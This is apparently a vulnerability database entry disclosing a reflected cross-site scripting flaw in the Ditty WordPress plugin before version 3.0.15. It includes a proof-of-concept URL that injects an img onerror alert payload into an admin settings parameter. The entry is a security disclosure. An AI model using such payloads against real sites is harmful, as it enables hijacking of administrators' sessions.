WordPress Plugin Vulnerabilities
Ditty (formerly Ditty News Ticker) < 3.0.15 - Reflected Cross-Site Scripting (XSS)
Description
The plugin is affected by a Reflected Cross-Site Scripting (XSS) vulnerability.
Proof of Concept
http://127.0.0.1:8001/wp-admin/edit.php?post_type=ditty&page=ditty_settings&tab=%22%3E%3Cimg+src+onerror%3Dalert%281%29%3E
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-02-09 (about 2 years ago)
Added
2022-02-09 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)